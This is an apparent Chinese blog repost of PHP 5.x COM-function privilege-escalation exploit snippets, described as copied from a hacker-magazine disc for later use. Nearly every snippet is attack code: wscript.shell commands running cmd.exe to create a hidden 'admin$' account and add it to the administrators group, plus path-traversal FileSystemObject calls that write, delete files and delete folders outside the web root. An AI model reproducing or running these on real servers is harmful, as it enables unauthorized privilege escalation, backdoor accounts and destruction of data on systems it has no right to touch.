PHP　5.x　COM　functions提权漏洞的利用--樱木花盗's　BLOG

在黑防光盘上看到的，用到了再试试管不管用。。。贴出来先。。。

RunApplication函数测试代码

<?php
$compatUI = new COM('{0355854A-7F23-47E2-B7C3-97EE8DD42CD8}');
$compatUI->RunApplication("something", "notepad.exe", 1);
?>

Wscript运行命令测试代码

<?php
$wscript = new COM('wscript.shell');
$wscript->Run("cmd.exe /c calc.exe");
?>

<?php
$wscript = new COM('wscript.shell'); $wscript->Run("cmd.exe /c net user admin$ /add");
$wscript->Run("cmd.exe /c net localgroup administrators admin$ /add");
?>

OpenTextFile测试代码

<?php
$mPath = str_repeat("..\\",20);
$FSO = new COM('Scripting.FileSystemObject');
$FSO->OpenTextFile($mPath."bat.bat", 8, true);
?>

DeleteFile测试代码

<?php
$mPath = str_repeat("..\\",20);
$FSOdelFile = new COM('Scripting.FileSystemObject');
$FSOdelFile->DeleteFile($mPath.".\\*.dat", True);
?>

DeleteFolder测试代码

<?php
$mPath = str_repeat("..\\",20);
$FSOdelFolder = new COM('Scripting.FileSystemObject');
$FSOdelFolder->DeleteFolder($mPath.".\\11", True);
?>

Create函数测试代码

<?php
$user = new COM('{60664CAF-AF0D-0004-A300-5C7D25FF22A0}');
$user->Create("asd");
?>

发表评论：